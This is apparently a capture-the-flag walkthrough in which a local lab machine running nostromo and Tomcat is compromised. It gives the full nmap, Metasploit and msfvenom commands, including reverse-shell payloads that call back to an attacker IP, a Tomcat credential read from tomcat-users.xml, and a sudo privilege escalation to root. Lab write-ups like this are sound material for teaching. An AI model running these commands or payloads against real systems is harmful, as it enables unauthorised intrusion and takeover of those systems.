Scanning the target with nmap –A –T4 –p- 192.168.1.7 –vv

There are few open ports, i dirbed them but what’s interesting is port 2222:

The link http://192.168.1.7:2222/cgi-bin/printenv gave us a file prinenv where we got some information to take advantage of like that the target is running a nostromo server and we have the port the URI path, (also the host is running tomcat server on port8080), but let it for now:

Searching for nostromo with Searchsploit we got some exploits:

And with the help of Metasploit we can do this: use exploit/multi/http/nostromo_code_exec


Now we already know that the target is running tomcat on port 8080, we need to find the user file where we can find the password of the tomcat server, the directory to the file is /usr/local/tomcat/conf/ and then we view the file tomcat-users.xml where the information there:

We can login with tomcat: @sprot0230sp

After we login we need to create a WAR file to upload it:
msfvenom -p java/shell_reverse_tcp lhost=192.168.1.6 lport=3333 -f war -o shell.war
And i used Metasploit as it’s much stable, but you can use nc –lvp 3333

The user tomcat can run sudo:

Once again we create a shell using msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1234 -f raw -o exploit.jar
And start a new Metasploit session:

Navigate to the root directory and catch the flag:
